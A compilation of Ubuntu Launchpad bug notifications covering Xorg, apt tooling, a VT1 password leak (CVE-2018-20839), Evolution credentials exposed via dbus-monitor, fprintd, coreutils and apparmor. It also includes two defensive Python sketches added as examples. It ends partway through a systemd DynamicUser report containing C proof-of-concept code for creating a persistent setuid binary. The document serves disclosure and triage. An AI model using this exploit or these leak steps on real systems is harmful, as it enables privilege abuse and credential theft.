  dmi.modalias: dmi:bvnLENOVO:bvrG1ET91WW(2.51):bd01/09/2013:svnLENOVO:pn2349IP5:pvrThinkPadT430:rvnLENOVO:rn2349IP5:rvrWin8ProDPKTPG:cvnLENOVO:ct10:cvrNotAvailable:
  dmi.product.family: ThinkPad T430
  dmi.product.name: 2349IP5
  dmi.product.version: ThinkPad T430
  dmi.sys.vendor: LENOVO
  version.compiz: compiz 1:0.9.13.1+18.04.20180302-0ubuntu1
  version.libdrm2: libdrm2 2.4.97-1ubuntu1~18.04.1
  version.libgl1-mesa-dri: libgl1-mesa-dri 19.0.2-1ubuntu1~18.04.1
  version.libgl1-mesa-glx: libgl1-mesa-glx 19.0.2-1ubuntu1~18.04.1
  version.xserver-xorg-core: xserver-xorg-core 2:1.19.6-1ubuntu4.2
  version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.10.5-1ubuntu1
  version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:18.0.1-1
  version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.99.917+git20171229-1
  version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:1.0.15-2
  xserver.bootTime: Sun May 19 02:45:50 2019
  xserver.configfile: default
  xserver.errors:
   open /dev/dri/card0: No such file or directory
   open /dev/dri/card0: No such file or directory
   Screen 0 deleted because of no matching config section.
   AIGLX: reverting to software rendering
  xserver.logfile: /var/log/Xorg.0.log
  xserver.outputs:
   
  xserver.version: 2:1.19.6-1ubuntu4.2

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/xorg/+bug/1829650/+subscriptions



[Touch-packages] [Bug 1829588] [NEW] make it easy to add proposed; help text outdated

2019-05-17 Thread Seth Arnold
Public bug reported:

I want to do some SRU testing but I have to look up how to add the
-proposed lines to apt sources every time I want to do this task. The
wiki page for it is pretty verbose and includes text like: "Replace
"xenial" with "trusty", "vivid", "utopic", "precise", or "lucid"
depending on which release you are on. "

Adding -proposed should be as easy as running:

sudo add-apt-repository proposed

But this doesn't work:
$ sudo add-apt-repository proposed
Error: 'proposed' invalid

The help text includes a bunch of examples of things that users almost
never need to do any more:

$ add-apt-repository -h
[...]
  Examples:
apt-add-repository 'deb http://myserver/path/to/repo stable myrepo'
apt-add-repository 'http://myserver/path/to/repo myrepo'
apt-add-repository 'https://packages.medibuntu.org free non-free'
apt-add-repository http://extras.ubuntu.com/ubuntu
apt-add-repository ppa:user/repository
apt-add-repository ppa:user/distro/repository
apt-add-repository multiverse


https://packages.medibuntu.org is now owned by a commerce site, or
squatter, or something similar. It also fails certificate validation.
This should be removed.

http://extras.ubuntu.com/ubuntu/dists/ has precise through utopic. Maybe
we shouldn't remove this yet, but someday we may want to revisit this
one.

It'd be great to have examples of adding proposed, universe, security,
updates, etc.

Maybe it'd be nice to put a reference to whatever tool would also enable
ESM.

Thanks

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: software-properties-common 0.96.24.32.7
ProcVersionSignature: Ubuntu 4.15.0-50.54-generic 4.15.18
Uname: Linux 4.15.0-50-generic x86_64
NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
ApportVersion: 2.20.9-0ubuntu7.6
Architecture: amd64
Date: Fri May 17 18:32:49 2019
InstallationDate: Installed on 2012-10-18 (2402 days ago)
InstallationMedia: Ubuntu 12.04.1 LTS "Precise Pangolin" - Release amd64 (20120823.1)
PackageArchitecture: all
ProcEnviron:
 TERM=rxvt-unicode-256color
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: software-properties
UpgradeStatus: Upgraded to bionic on 2018-05-02 (381 days ago)

** Affects: software-properties (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: amd64 apport-bug bionic third-party-packages

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to software-properties in
Ubuntu.
https://bugs.launchpad.net/bugs/1829588

Title:
  make it easy to add proposed; help text outdated

Status in software-properties package in Ubuntu:
  New


[Touch-packages] [Bug 1803993] Re: Password appears on the VT1 screen

2019-05-17 Thread Seth Arnold
Use CVE-2018-20839.

Thanks

** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-20839

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1803993

Title:
  Password appears on the VT1 screen

Status in gdm3 package in Ubuntu:
  Invalid
Status in plymouth package in Ubuntu:
  Invalid
Status in systemd package in Ubuntu:
  In Progress

Bug description:
  [Impact]

   * The keyboard on the graphical login screen started on VT1 may stop
  working and/or keypresses including passwords are leaked to the
  terminal console running 'behind' the graphical login screen or
  environment.

  [Test Case]

   * Reboot after installing the fixed systemd package.
   * Install sysdig
   * Start sysdig on a remote connection or on a terminal console:
     $ sudo sysdig evt.type=ioctl | grep  request=4B4
   * While sysdig is running log in and out 3 times in GDM and press a few
     keys in the graphical session to see if keyboard still works
   * Log in and out on another terminal console, too, running a few
     commands while being logged in to ensure that keyboard is working.
   * Observe that on terminal consoles the monitored keyboard setter ioctl
     is called with argument=3, but where the graphical screen is active
     only argument=4 is used, unlike with the buggy version observed in
     https://bugs.launchpad.net/ubuntu/+source/gdm3/+bug/1803993/comments/14

  [Regression Potential]

   * The fix checks the current keyboard mode of the VT and allows only
  safe mode switches. The potential regression could be not allowing a
  valid mode switch keeping a keyboard in a non-operational mode.
  Testing covers that by typing on the keyboard.

  
  (continued from bug 1767918)

  This was found when an administrative error made /home directory
  inaccessible.  Any users that tried to login after that, were not able
  to (which is expected) but their password appears on the VT1 screen.
  Under normal circumstances, VT1 is not visible. But once the system
  was sent into this compromised mode, one can press ctrl+alt+F1 and
  then ctrl+alt+F2 and get a momentary glance at VT1. One can keep
  toggling between these key combinations in order to make out the
  password(s) on VT1.

  As a further test, I wanted to see if a non-super user could cause
  this condition, and it is in fact possible. As a regular user, I made
  their own home directory not writable and then removed ~/.config and
  logged out. Then logged in as that user again, and although that user
  can't login the system does go into that mode where passwords appear
  on VT1 and are viewable with the key combinations mentioned herein.
  Further, any other users that login will see no problem, but when they
  logon their passwords also appear on VT1 and are viewable.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: gdm3 3.28.3-0ubuntu18.04.3
  Uname: Linux 4.19.2-041902-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.5
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Mon Nov 19 08:32:59 2018
  InstallationDate: Installed on 2018-08-25 (85 days ago)
  InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: gdm3
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gdm3/+bug/1803993/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
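
The [Regression Potential] note in the bug description above says the fix checks the VT's current keyboard mode and allows only safe mode switches. The sketch below is an added example, not systemd's code and not part of the original message; it assumes "safe" means the VT is already in a text mode, and `RealVT`, `FakeVT`, `reset_keyboard_guarded`, `reset_keyboard_unguarded` and `demo` are hypothetical names. The ioctl numbers and mode values are those of <linux/kd.h>.

```python
"""Guarded VT keyboard-mode reset: an illustrative sketch, not systemd's code."""
import fcntl
import struct

# ioctl request numbers and keyboard-mode values from <linux/kd.h>.
KDGKBMODE = 0x4B44  # read the VT's current keyboard mode
KDSKBMODE = 0x4B45  # set it; the test case's "grep request=4B4" surfaces this call
K_RAW, K_XLATE, K_MEDIUMRAW, K_UNICODE, K_OFF = range(5)
MODE_NAMES = {K_RAW: "K_RAW", K_XLATE: "K_XLATE", K_MEDIUMRAW: "K_MEDIUMRAW",
              K_UNICODE: "K_UNICODE", K_OFF: "K_OFF"}

# Assumption of this example: a reset is "safe" only when the VT is already in
# a text mode. K_OFF (argument=4 in the test case) or K_RAW means a graphical
# session owns the keyboard, and forcing K_UNICODE (argument=3) there would
# make the text console underneath receive the keypresses as well.
TEXT_MODES = frozenset({K_XLATE, K_UNICODE})


class RealVT:
    """Thin wrapper around an open VT file descriptor (e.g. /dev/tty1, needs root)."""

    def __init__(self, fd):
        self.fd = fd

    def get_mode(self):
        buf = bytearray(struct.calcsize("i"))
        fcntl.ioctl(self.fd, KDGKBMODE, buf)   # kernel writes an int into buf
        return struct.unpack("i", buf)[0]

    def set_mode(self, mode):
        fcntl.ioctl(self.fd, KDSKBMODE, mode)  # mode is passed by value


class FakeVT:
    """In-memory stand-in so the logic can be exercised without a console."""

    def __init__(self, mode):
        self.mode = mode
        self.set_calls = []

    def get_mode(self):
        return self.mode

    def set_mode(self, mode):
        self.set_calls.append(mode)
        self.mode = mode


def reset_keyboard_unguarded(vt):
    """Unconditional reset: the pattern the test case is designed to catch."""
    vt.set_mode(K_UNICODE)


def reset_keyboard_guarded(vt, wanted=K_UNICODE):
    """Reset only a VT that is already in a text mode.

    Returns True if the VT is (now) in the wanted text mode, False if the
    switch was refused because something else owns the keyboard.
    """
    current = vt.get_mode()
    if current not in TEXT_MODES:
        return False            # leave K_OFF / K_RAW / K_MEDIUMRAW untouched
    if current != wanted:
        vt.set_mode(wanted)
    return True


def demo():
    """Final mode after (unguarded, guarded) reset for two starting states."""
    results = {}
    for label, start in (("text console", K_XLATE), ("graphical login", K_OFF)):
        naive, guarded = FakeVT(start), FakeVT(start)
        reset_keyboard_unguarded(naive)
        reset_keyboard_guarded(guarded)
        results[label] = (MODE_NAMES[naive.mode], MODE_NAMES[guarded.mode])
    return results


if __name__ == "__main__":
    for label, modes in demo().items():
        print(label, modes)
```

The refused switch is also the regression risk the description names: a VT left in a non-text mode by a crashed session stays that way until something with better knowledge of the session resets it.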


[Touch-packages] [Bug 1828190] Re: latest wget debian for ubuntu 16.04

2019-05-15 Thread Seth Arnold
Vibhu, please see https://usn.ubuntu.com/3943-1/ for information on the
most recent wget security update we performed.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to wget in Ubuntu.
https://bugs.launchpad.net/bugs/1828190

Title:
  latest wget debian for ubuntu 16.04

Status in wget package in Ubuntu:
  Invalid

Bug description:
  We are looking for the latest debians for wget in ubuntu 16.04. Can
  someone help? This is to address some security vulnerabilities

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/wget/+bug/1828190/+subscriptions



[Touch-packages] [Bug 1828124] Re: org.gnome.evolution.dataserver.Source completely unveils account credentials in plain text while using dbus-monitor

2019-05-10 Thread Seth Arnold
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to evolution-data-server in
Ubuntu.
https://bugs.launchpad.net/bugs/1828124

Title:
  org.gnome.evolution.dataserver.Source completely unveils account
  credentials in plain text while using dbus-monitor

Status in evolution-data-server:
  Unknown
Status in evolution-data-server package in Ubuntu:
  Incomplete

Bug description:
  Steps to reproduce:
  1. Install Ubuntu 16.04 LTS
  2. Install Evolution
  3. Set-up Google account with default settings (this will end with e-mail
     and calendar)
  4. Reboot
  5. Open evolution Calendar and/or indicator-datetime
  6. Launch `dbus-monitor`

  Expected results:
  * Evolution does not show account credentials in plain text in
    `dbus-monitor` output

  Actual results:
  * Evolution shows account credentials in plain text in `dbus-monitor` output:

  
  method call time=1557268474.383095 sender=:1.74 -> destination=:1.40 serial=939 path=/org/gnome/evolution/dataserver/SourceManager/Source_17; interface=org.gnome.evolution.dataserver.Source; member=InvokeAuthenticate
     array [
        string "password:myrealpassword"
        string "ssl-trust:"
     ]
  method return time=1557268474.383686 sender=:1.40 -> destination=:1.74 serial=366 reply_serial=939
  signal time=1557268474.389206 sender=:1.40 -> destination=(null destination) serial=367 path=/org/gnome/evolution/dataserver/SourceManager/Source_17; interface=org.gnome.evolution.dataserver.Source; member=Authenticate
     array [
        string "password:myrealpassword"
        string "ssl-trust:"
     ]

  signal time=1557268520.956861 sender=:1.40 -> destination=(null destination) serial=408 path=/org/gnome/evolution/dataserver/SourceManager/Source_19; interface=org.gnome.evolution.dataserver.Source; member=Authenticate
     array [
        string "password:myrealpassword"
        string "ssl-trust:"
        string "username:real@email"
     ]
  signal time=1557268520.960443 sender=:1.40 -> destination=(null destination) serial=409 path=/org/gnome/evolution/dataserver/SourceManager/Source_18; interface=org.gnome.evolution.dataserver.Source; member=Authenticate
     array [
        string "password:myrealpassword"
        string "ssl-trust:"
        string "username:real@email"
     ]
  signal time=1557268520.964374 sender=:1.40 -> destination=(null destination) serial=410 path=/org/gnome/evolution/dataserver/SourceManager/Source_20; interface=org.gnome.evolution.dataserver.Source; member=Authenticate
     array [
        string "password:myrealpassword"
        string "ssl-trust:"
        string "username:real@email"
     ]

  -
  This is a huge security flaw. A malicious script can parse `dbus-monitor`
  output...
  Not sure about more recent Ubuntu and Evolution versions.

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: evolution-data-server-common 3.18.5-1ubuntu1.1
  ProcVersionSignature: Ubuntu 4.4.0-143.169-generic 4.4.170
  Uname: Linux 4.4.0-143-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2.18
  Architecture: amd64
  CurrentDesktop: Unity
  Date: Wed May  8 01:40:27 2019
  InstallationDate: Installed on 2018-01-04 (488 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
  PackageArchitecture: all
  SourcePackage: evolution-data-server
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/evolution-data-server/+bug/1828124/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp
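
Captures like the one in the report above tend to end up attached to public bug reports with the secrets still in them. The following is an added example, not part of the original report and not Evolution or dbus-monitor code: it scans dbus-monitor text output for `string "key:value"` arguments whose key is secret-bearing, records which D-Bus member carried them, and masks the value. The sample capture is trimmed from the report's output with its wrapped lines re-joined; `scrub`, `SECRET_KEYS` and `MASK` are names chosen for this sketch.

```python
"""Mask credentials in dbus-monitor text captures before they are shared."""
import re

SECRET_KEYS = frozenset({"password"})  # keys whose values must not leave the host
MASK = "[REDACTED]"

# First line of each message in dbus-monitor's text output.
HEADER_RE = re.compile(r"^\s*(method call|method return|signal|error)\s")
# Header fields worth keeping in a finding; path/interface values end at ';'.
FIELD_RE = re.compile(r"\b(sender|path|interface|member)=([^;\s]+)")
# An argument line such as:      string "password:secret"
STRING_RE = re.compile(r'^(\s*string ")([^":]+):(.*)"\s*$')

# Sample trimmed from the report above (its placeholder values, lines re-joined).
SAMPLE_CAPTURE = '''\
method call time=1557268474.383095 sender=:1.74 -> destination=:1.40 serial=939 path=/org/gnome/evolution/dataserver/SourceManager/Source_17; interface=org.gnome.evolution.dataserver.Source; member=InvokeAuthenticate
   array [
      string "password:myrealpassword"
      string "ssl-trust:"
   ]
method return time=1557268474.383686 sender=:1.40 -> destination=:1.74 serial=366 reply_serial=939
signal time=1557268520.956861 sender=:1.40 -> destination=(null destination) serial=408 path=/org/gnome/evolution/dataserver/SourceManager/Source_19; interface=org.gnome.evolution.dataserver.Source; member=Authenticate
   array [
      string "password:myrealpassword"
      string "ssl-trust:"
      string "username:real@email"
   ]
'''


def scrub(capture, secret_keys=SECRET_KEYS):
    """Return (masked_text, findings) for a dbus-monitor text capture.

    Each finding names the message that carried a secret, so the leak can be
    reported against the right interface and member without quoting the secret.
    """
    findings, out, msg = [], [], {}
    for line in capture.splitlines():
        header = HEADER_RE.match(line)
        if header:
            # A new message starts: remember who sent what to which object.
            msg = dict(FIELD_RE.findall(line))
            msg["kind"] = header.group(1)
        arg = STRING_RE.match(line)
        if arg:
            prefix, key, value = arg.groups()
            # Empty values and already-masked values are not findings.
            if key.lower() in secret_keys and value and value != MASK:
                findings.append({
                    "key": key,
                    "kind": msg.get("kind"),
                    "sender": msg.get("sender"),
                    "path": msg.get("path"),
                    "interface": msg.get("interface"),
                    "member": msg.get("member"),
                })
                line = f'{prefix}{key}:{MASK}"'
        out.append(line)
    return "\n".join(out) + "\n", findings


if __name__ == "__main__":
    masked, found = scrub(SAMPLE_CAPTURE)
    print(masked)
    for f in found:
        print(f'{f["kind"]}: {f["interface"]}.{f["member"]} carried "{f["key"]}"')
```

Add further keys to `SECRET_KEYS` if usernames or other fields also need to stay private in a given report.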


[Touch-packages] [Bug 1822590] Re: Found storing user fingerprints without encryption

2019-05-07 Thread Seth Arnold
Incidentally, there's nothing for the AppArmor project to do here -- any
confined program will include or not include the fingerprint data as
specified in the profile.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1822590

Title:
  Found storing user fingerprints without encryption

Status in fprintd:
  New
Status in apparmor package in Ubuntu:
  Won't Fix
Status in fprintd package in Ubuntu:
  Triaged
Status in Debian:
  Unknown

Bug description:
  Dear all,

  I would like to report a new issue as follows.
  ‘fprintd’ saves fingerprint data, ISO/IEC 19794-2 formatted, to a file on
  the host without any encryption.
  Though fprintd generates the fingerprint image with root permission to
  protect the file from attackers, that is not of itself sufficient.
  It has been a well-known threat model for about a decade that formatted
  fingerprint data can be restored to the original image.
  The approaches in [1-4] create sophisticated and natural-looking
  fingerprints only from the numerical template data format as defined in
  ISO/IEC 19794-2.
  They also successfully evaluated these approaches against a number of
  undisclosed state-of-the-art algorithms and the NIST Fingerprint Image
  Software.

  We need improvements of those issues.

  [1] R. Cappelli et al., “Fingerprint Image Reconstruction from Standard
      Templates”, IEEE Trans. on Pattern Analysis and Machine Intelligence,
      vol.29, no.9, pp.1489-1503, 2007.
  [2] A. Ross et al., “From template to image: Reconstructing fingerprints
      from minutiae points”, IEEE Trans. on Pattern Analysis and Machine
      Intelligence, vol.29, no.4, pp.544-560, 2007.
  [3] R. Cappelli et al., “Can Fingerprints be reconstructed from ISO
      Templates?”, IEEE ICARCV 2006.
  [4] J. Feng et al., “Fingerprint Reconstruction: From Minutiae to Phase”,
      IEEE Trans. on Pattern Analysis and Machine Intelligence, vol.33, no.2,
      pp.209-223, 2011.

  Sincerely,
  Seong-Joong Kim

To manage notifications about this bug go to:
https://bugs.launchpad.net/fprintd/+bug/1822590/+subscriptions



[Touch-packages] [Bug 1822590] Re: Found storing user fingerprints without encryption

2019-05-07 Thread Seth Arnold
I'll include as a comment my reply to an email from the reporter:

Hello,

Note that the Ubuntu security team considers fingerprints to be akin to
usernames, rather than passwords. They cannot be changed, they are left on
thousands of objects daily, and repeated demonstrations of sensors being
'fooled' by artificial constructions from photographs etc basically mean
fingerprints are not worth much as authentication tokens.

In the Main Inclusion Request review for fprintd and libfprint, we
included:

It's important to note that security team considers fingerprints to
be akin to usernames and not passwords. Any potential issues with
this tool will be treated with this threat model in mind.

-- https://bugs.launchpad.net/ubuntu/+source/fprintd/+bug/1745455

Under this threat model, disclosure of a fingerprint is not a
vulnerability.

Perhaps the fprintd or libfprintd authors will see things differently,
but I suspect most security practitioners have decided that fingerprints
are identifiers, not authenticators.

Thanks



** Changed in: apparmor (Ubuntu)
   Status: New => Won't Fix

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1822590

Title:
  Found storing user fingerprints without encryption

Status in fprintd:
  New
Status in apparmor package in Ubuntu:
  Won't Fix
Status in fprintd package in Ubuntu:
  Triaged
Status in Debian:
  Unknown


To manage notifications about this bug go to:
https://bugs.launchpad.net/fprintd/+bug/1822590/+subscriptions



[Touch-packages] [Bug 1774857] Re: sort doesn't sort and uniq loses data for many non-Latin scripts on UTF-8 locales

2019-04-29 Thread Seth Arnold
Probably related:
https://bugzilla.redhat.com/show_bug.cgi?id=1336308

and probably related:
https://sourceware.org/git/?p=glibc.git;a=commit;h=b11643c21c5c9d67a69c8ae952e5231ce002e7f1

Thanks

** Bug watch added: Red Hat Bugzilla #1336308
   https://bugzilla.redhat.com/show_bug.cgi?id=1336308

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to coreutils in Ubuntu.
https://bugs.launchpad.net/bugs/1774857

Title:
  sort doesn't sort and uniq loses data for many non-Latin scripts on
  UTF-8 locales

Status in coreutils package in Ubuntu:
  New
Status in glibc package in Ubuntu:
  New

Bug description:
  I’ve found out that sort doesn’t sort strings for many non-Latin
  scripts at all if the locale you’re using is one of en_US.UTF-8,
  fr_FR.UTF-8 or fi_FI.UTF-8 (probably others, too, but these are the
  ones I have tested). For locales ”C” and ko_KR.UTF-8, things work as
  expected. Here’s a test case:

  Open xterm, launch sort and input some lines of Syriac, Ethiopic,
  Korean, Japanese (Hiragana or Katakana, not Han) or Thai text
  repeating one of the lines twice. Here’s an example in Syriac:

  ܡܠܬܐ
  ܒܝܬܐ
  ܒܪܢܫܐ
  ܡܠܬܐ

  Sort produces the following:

  ܡܠܬܐ
  ܒܝܬܐ
  ܡܠܬܐ
  ܒܪܢܫܐ

  Here strings are ordered only according to their length but not
  characters. Even the two instances of the word ܡܠܬܐ are found on non-
  adjacent lines (1 and 3). The expected sort order based on Unicode
  points would be:

  ܒܝܬܐ
  ܒܪܢܫܐ
  ܡܠܬܐ
  ܡܠܬܐ

  If you further pass sort’s output to uniq, it produces the following:

  ܡܠܬܐ
  ܒܪܢܫܐ

  Here the word on line 2 ܒܝܬܐ is completely lost since, like sort, uniq
  seems to consider all Syriac strings of equal length as the same.

  Although this issue affects locale, I think it is not a locale issue
  per se, since perl seems to handle similar cases expectedly. For
  instance, the following command produces the expected result:

  perl -CDS -e 'use locale; use utf8; @str = ("ܡܠܬܐ", "ܒܝܬܐ", "ܒܪܢܫܐ",
  "ܡܠܬܐ"); foreach $i (sort @str) { print "$i\n"; }'

  Curiously enough, codepoints in Plane 1 seem to count as two
  codepoints of the basic plane, so that if you sort | uniq the
  following (six codepoints of Syriac and three codepoints of
  Phoenician):

  ܥܠܝܟܘܢ
  ँउक

  you get ”ܥܠܝܟܘܢ" as the result whereas ”ँउक” is lost. This is of
  course due to the UTF-8 representation of Plane 1 characters as two
  surrogate characters on the basic plane.

  Also curiously, LTR scripts seem to conflate with each other and RTL
  scripts among themselves but not across the directionality line, so
  that if you sort | uniq the following (three codepoints each in
  Ethiopic, Hangul, Syriac, Hiragana and Thai):

  ዘመን
  스물셋
  ܐܢܐ
  わたし
  ฟ้า

  you are left with:

  ܐܢܐ
  ዘመን

  That’s one line of Syriac and one line of Ethiopic; everything else
  was lost. This issue does not seem to affect most Indic scripts
  (Devanagari, Bengali, Telugu etc.) or Arabic. For CJK, things work as
  expected for the main Unicode block (4E00..9FFF) but not for Extension
  A (3400..4DBF, such as 㗖 or 㡘 or 㰋). For Greek, monotonic accents work
  fine but all polytonic letters are conflated (αὐλὸς and αὐλῆς conflate
  to αὐλῆς). For Hebrew, letters and vowel marks work fine but
  cantillation marks are conflated.

  
  Description:  Ubuntu 18.04 LTS
  Release:  18.04

  coreutils:
    Installed: 8.28-1ubuntu1
    Candidate: 8.28-1ubuntu1
    Version table:
   *** 8.28-1ubuntu1 500
          500 http://mr.archive.ubuntu.com/ubuntu bionic/main amd64 Packages
          100 /var/lib/dpkg/status

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: coreutils 8.28-1ubuntu1
  ProcVersionSignature: Ubuntu 4.15.0-22.24-generic 4.15.17
  Uname: Linux 4.15.0-22-generic x86_64
  ApportVersion: 2.20.9-0ubuntu7.1
  Architecture: amd64
  CurrentDesktop: ubuntu:GNOME
  Date: Sun Jun  3 10:13:06 2018
  InstallationDate: Installed on 2017-02-13 (474 days ago)
  InstallationMedia: Ubuntu 16.10 "Yakkety Yak" - Release amd64 (20161012.2)
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=fi_FI.UTF-8
   SHELL=/bin/bash
  SourcePackage: coreutils
  UpgradeStatus: Upgraded to bionic on 2018-05-31 (2 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/coreutils/+bug/1774857/+subscriptions



[Touch-packages] [Bug 1826429] Re: package apparmor 2.13.2-9ubuntu6 failed to install/upgrade: installed apparmor package post-installation script subprocess returned error exit status 1

2019-04-25 Thread Seth Arnold
Hello, this is pretty confusing: coreutils in both 18.10 and 19.04 have
mv -Z support, so regardless of which coreutils package was unpacked at
the time, the command should have succeeded.

Could you do some investigation?

which mv
mv --help | grep Z
ls -l `which mv`
dpkg -S `which mv`
debsums -as $(dpkg -S $(which mv) | cut -d: -f1)

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1826429

Title:
  package apparmor 2.13.2-9ubuntu6 failed to install/upgrade: installed
  apparmor package post-installation script subprocess returned error
  exit status 1

Status in apparmor package in Ubuntu:
  New

Bug description:
  error when upgrading from ubuntu 18.10 to 19.04

  ProblemType: Package
  DistroRelease: Ubuntu 19.04
  Package: apparmor 2.13.2-9ubuntu6
  ProcVersionSignature: Error: [Errno 2] No such file or directory: '/proc/version_signature'
  Uname: Linux 4.20.0-042000-generic x86_64
  ApportVersion: 2.20.10-0ubuntu13.3
  Architecture: amd64
  Date: Thu Apr 25 23:17:05 2019
  ErrorMessage: installed apparmor package post-installation script subprocess returned error exit status 1
  ProcKernelCmdline: BOOT_IMAGE=/vmlinuz-4.20.0-042000-generic root=UUID=4b7cc41e-02a4-11e9-a2fe-94c6911d33aa ro
  Python3Details: /usr/bin/python3.7, Python 3.7.3, python3-minimal, 3.7.3-1
  PythonDetails: /usr/bin/python2.7, Python 2.7.16, python-minimal, 2.7.16-1
  RelatedPackageVersions:
   dpkg 1.19.6ubuntu1
   apt  1.8.0
  SourcePackage: apparmor
  Syslog:
   
  Title: package apparmor 2.13.2-9ubuntu6 failed to install/upgrade: installed apparmor package post-installation script subprocess returned error exit status 1
  UpgradeStatus: Upgraded to disco on 2019-04-25 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1826429/+subscriptions



[Touch-packages] [Bug 1814596] Re: DynamicUser can create setuid binaries when assisted by another process

2019-04-25 Thread Seth Arnold
Thanks Jann

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1814596

Title:
  DynamicUser can create setuid binaries when assisted by another
  process

Status in systemd package in Ubuntu:
  New

Bug description:
  [I am sending this bug report to Ubuntu as requested by systemd at
  
.]

  This bug report describes a bug in systemd that allows a service with
  DynamicUser in collaboration with another service or user to create a setuid
  binary that can be used to access its UID beyond the lifetime of the service.
  This bug probably has relatively low severity, given that there aren't many
  services yet that use DynamicUser, and the requirement of collaboration with
  another process limits the circumstances in which it would be useful to an
  attacker further; but in a system that makes heavy use of DynamicUser, it
  would probably have impact.

  

  says:

      In order to allow the service to write to certain directories, they have to
      be whitelisted using ReadWritePaths=, but care must be taken so that UID/GID
      recycling doesn't create security issues involving files created by the
      service.

  While I was chatting about DynamicUser with catern on IRC, I noticed that
  DynamicUser doesn't isolate the service from the rest of the system in terms
  of UNIX domain sockets; therefore, if a collaborating user passes a file
  descriptor to a world-writable path outside the service's mount namespace
  into the service, the service can then create setuid files that can be used
  by the collaborating user beyond the lifetime of the service.

  
  To reproduce:

  As a user:
  ==
  user@deb10:~$ mkdir systemd_uidleak
  user@deb10:~$ cd systemd_uidleak
  user@deb10:~/systemd_uidleak$ cat > breakout_assisted.c
  #define _GNU_SOURCE
  #include <stdio.h>
  #include <stdlib.h>
  #include <unistd.h>
  #include <fcntl.h>
  #include <err.h>
  #include <alloca.h>
  #include <sys/socket.h>
  #include <sys/un.h>
  #include <sys/stat.h>

  int main(void) {
    setbuf(stdout, NULL);

    // prepare unix domain socket
    int s = socket(AF_UNIX, SOCK_DGRAM, 0);
    if (s < 0) err(1, "unable to create unix domain socket");
    struct sockaddr_un addr = {
      .sun_family = AF_UNIX,
      .sun_path = "\0breakout"
    };
    if (bind(s, (struct sockaddr *)&addr, sizeof(sa_family_t)+1+8))
      err(1, "unable to bind abstract socket");
    puts("waiting for connection from outside the service...");

    // receive fd to somewhere under the real root
    int len = sizeof(struct cmsghdr) + sizeof(int);
    struct cmsghdr *hdr = alloca(len);
    struct msghdr msg = {
      .msg_control = hdr,
      .msg_controllen = len
    };
    if (recvmsg(s, &msg, 0) < 0) err(1, "unable to receive fd");
    if (hdr->cmsg_len != len || hdr->cmsg_level != SOL_SOCKET
        || hdr->cmsg_type != SCM_RIGHTS)
      errx(1, "got bad message");
    puts("got rootfd from other chroot...");
    if (fchdir(*(int*)CMSG_DATA(hdr))) err(1, "unable to change into real root");
    char curpath[4096];
    if (!getcwd(curpath, sizeof(curpath))) err(1, "unable to getpath()");
    printf("chdir successful, am now in %s\n", curpath);

    // create suid file
    int src_fd = open("suid_src", O_RDONLY);
    if (src_fd == -1) err(1, "open suid_src");
    int dst_fd = open("suid_dst", O_RDWR|O_CREAT|O_EXCL, 0644);
    if (dst_fd == -1) err(1, "open suid_dst");

    while (1) {
      char buf[1000];
      ssize_t res = read(src_fd, buf, sizeof(buf));
      if (res == -1) err(1, "read");
      if (res == 0) break;
      ssize_t res2 = write(dst_fd, buf, res);
      if (res2 != res) err(1, "write");
